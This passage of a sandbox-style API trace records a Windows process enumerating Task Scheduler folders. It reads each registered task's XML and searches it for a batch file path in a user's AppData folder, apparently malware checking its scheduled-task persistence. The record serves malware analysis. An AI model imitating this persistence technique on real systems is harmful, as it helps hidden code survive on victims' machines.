%windir%\\system32\\lpremove.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.408] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.408] IUnknown:Release (This=0x929460) returned 0x0 [0162.408] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.409] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.409] IUnknown:Release (This=0x929460) returned 0x0 [0162.409] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.409] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.409] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.410] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.410] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.410] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="SystemSoundsService") returned 0x0 [0162.410] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n \\Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n") returned 0x0 [0162.411] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n \\Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.412] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.412] IUnknown:Release (This=0x929470) returned 0x0 [0162.412] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.412] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.412] IUnknown:Release (This=0x929470) returned 0x0 [0162.412] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.412] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x27, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.412] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.413] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.413] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.413] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="GatherNetworkInfo") returned 0x0 [0162.413] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n") returned 0x0 [0162.414] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.414] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.414] IUnknown:Release (This=0x929460) returned 0x0 [0162.414] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.415] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.415] IUnknown:Release (This=0x929460) returned 0x0 [0162.415] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.415] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.415] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.416] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.416] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.416] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="WiFiTask") returned 0x0 [0162.416] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)(A;;FA;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-1)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-2)\r\n \\Microsoft\\Windows\\NlaSvc\\WiFiTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n true\r\n Queue\r\n 6\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA323028741\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\WiFiTask.exe\r\n nla\r\n \r\n \r\n") returned 0x0 [0162.417] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)(A;;FA;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-1)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-2)\r\n \\Microsoft\\Windows\\NlaSvc\\WiFiTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n true\r\n Queue\r\n 6\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA323028741\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\WiFiTask.exe\r\n nla\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.417] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.417] IUnknown:Release (This=0x929460) returned 0x0 [0162.417] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.417] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.417] IUnknown:Release (This=0x929460) returned 0x0 [0162.417] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.417] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.417] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.418] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.418] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.418] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Background Synchronization") returned 0x0 [0162.418] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P1D\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n PT2H\r\n \r\n PT20M\r\n \r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n") returned 0x0 [0162.419] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P1D\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n PT2H\r\n \r\n PT20M\r\n \r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.419] IUnknown:Release (This=0x929600) returned 0x0 [0162.419] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.419] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Logon Synchronization") returned 0x0 [0162.419] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n P1D\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT4M\r\n \r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n") returned 0x0 [0162.419] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n P1D\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT4M\r\n \r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.420] IUnknown:Release (This=0x929600) returned 0x0 [0162.420] IUnknown:Release (This=0x929470) returned 0x0 [0162.420] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.420] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.420] IUnknown:Release (This=0x929470) returned 0x0 [0162.420] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.420] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.420] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.421] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.421] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.421] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="Secure-Boot-Update") returned 0x0 [0162.421] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2012-02-07T16:39:20\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-604)\r\n \\Microsoft\\Windows\\PI\\Secure-Boot-Update\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E0C9541\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n") returned 0x0 [0162.421] StrStrIW (lpFirst="\r\n\r\n \r\n 2012-02-07T16:39:20\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-604)\r\n \\Microsoft\\Windows\\PI\\Secure-Boot-Update\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT1H\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33E0C9541\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.422] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.422] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.422] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="Sqm-Tasks") returned 0x0 [0162.422] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2011-07-22T00:00:00.8844064\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-603)\r\n \\Microsoft\\Windows\\PI\\Sqm-Tasks\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n") returned 0x0 [0162.422] StrStrIW (lpFirst="\r\n\r\n \r\n 2011-07-22T00:00:00.8844064\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-603)\r\n \\Microsoft\\Windows\\PI\\Sqm-Tasks\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.422] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.422] IUnknown:Release (This=0x929460) returned 0x0 [0162.423] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.423] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.423] IUnknown:Release (This=0x929460) returned 0x0 [0162.423] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.423] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2b, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.423] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.423] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.423] IUnknown:Release (This=0x929460) returned 0x0 [0162.423] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.424] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=1) returned 0x0 [0162.424] ITaskFolderCollection:get_Item (in: This=0x929460, index=0xce080*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce030 | out: ppFolder=0xce030*=0x9295e0) returned 0x0 [0162.424] ITaskFolder:GetTasks (in: This=0x9295e0, flags=1, ppTasks=0xcdea0 | out: ppTasks=0xcdea0*=0x9296b0) returned 0x0 [0162.424] IRegisteredTaskCollection:get_Count (in: This=0x9296b0, pCount=0xcde98 | out: pCount=0xcde98*=0) returned 0x0 [0162.424] IUnknown:Release (This=0x9296b0) returned 0x0 [0162.424] ITaskFolder:GetFolders (in: This=0x9295e0, flags=0, ppFolders=0xcde88 | out: ppFolders=0xcde88*=0x9296b0) returned 0x0 [0162.424] ITaskFolderCollection:get_Count (in: This=0x9296b0, pCount=0xcde94 | out: pCount=0xcde94*=0) returned 0x0 [0162.425] IUnknown:Release (This=0x9296b0) returned 0x0 [0162.425] TaskScheduler:IUnknown:Release (This=0x9295e0) returned 0x0 [0162.425] IUnknown:Release (This=0x929460) returned 0x0 [0162.425] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.425] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.425] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.425] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0162.425] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.425] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Device Install Group Policy") returned 0x0 [0162.425] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\pnppolicy.dll,-600)\r\n $(@%SystemRoot%\\system32\\pnppolicy.dll,-602)\r\n \\Microsoft\\Windows\\Plug and Play\\Device Install Group Policy\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P1D\r\n true\r\n Queue\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n \r\n \r\n {60400283-B242-4FA8-8C25-CAF695B88209}\r\n \r\n \r\n") returned 0x0 [0162.426] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\pnppolicy.dll,-600)\r\n $(@%SystemRoot%\\system32\\pnppolicy.dll,-602)\r\n \\Microsoft\\Windows\\Plug and Play\\Device Install Group Policy\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P1D\r\n true\r\n Queue\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n \r\n \r\n {60400283-B242-4FA8-8C25-CAF695B88209}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.426] IUnknown:Release (This=0x929600) returned 0x0 [0162.426] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.426] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Device Install Reboot Required") returned 0x0 [0162.426] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n O:BAG:BAD:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\pnpui.dll,-600)\r\n $(@%SystemRoot%\\system32\\pnpui.dll,-602)\r\n \\Microsoft\\Windows\\Plug and Play\\Device Install Reboot Required\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33D009602\r\n \r\n \r\n \r\n \r\n {48794782-6A1F-47B9-BD52-1D5F95D49C1B}\r\n \r\n \r\n") returned 0x0 [0162.427] StrStrIW (lpFirst="\r\n\r\n \r\n O:BAG:BAD:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\pnpui.dll,-600)\r\n $(@%SystemRoot%\\system32\\pnpui.dll,-602)\r\n \\Microsoft\\Windows\\Plug and Play\\Device Install Reboot Required\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33D009602\r\n \r\n \r\n \r\n \r\n {48794782-6A1F-47B9-BD52-1D5F95D49C1B}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.427] IUnknown:Release (This=0x929600) returned 0x0 [0162.427] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.427] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Plug and Play Cleanup") returned 0x0 [0162.427] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-201)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-201)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-202)\r\n \\Microsoft\\Windows\\Plug and Play\\Plug and Play Cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1M\r\n P2M\r\n \r\n \r\n \r\n \r\n \r\n {DEF03232-9688-11E2-BE7F-B4B52FD966FF}\r\n \r\n \r\n") returned 0x0 [0162.428] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-201)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-201)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-202)\r\n \\Microsoft\\Windows\\Plug and Play\\Plug and Play Cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1M\r\n P2M\r\n \r\n \r\n \r\n \r\n \r\n {DEF03232-9688-11E2-BE7F-B4B52FD966FF}\r\n 